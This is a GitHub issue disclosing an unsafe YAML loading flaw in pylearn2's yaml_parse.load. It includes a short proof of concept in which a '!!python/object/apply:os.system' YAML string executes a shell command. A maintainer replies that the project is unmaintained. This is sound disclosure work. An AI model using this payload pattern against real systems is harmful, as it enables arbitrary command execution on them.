You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi, there is a vulnerability in load methods in pylearn2.config.yaml_parse.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered:
This project is dead. I do not think someone will update it unless you do a
PR.
Thanks for the report. It is useful to raise awareness of such type of
problem.
Le lun. 10 déc. 2018 20:34, bigbigliang-malwarebenchmark <
[email protected]> a écrit :
import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)
Hi, there is a vulnerability in load methods in
pylearn2.config.yaml_parse.py,please see PoC above. It can execute
arbitrary python commands resulting in command execution.
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#1593>, or mute the thread
<https://github.com/notifications/unsubscribe-auth/AALC-0i20n1Cfrn7-xI2ooAmu22K17Lwks5u3wuzgaJpZM4ZMf85>
.
import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)
Hi, there is a vulnerability in load methods in pylearn2.config.yaml_parse.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered: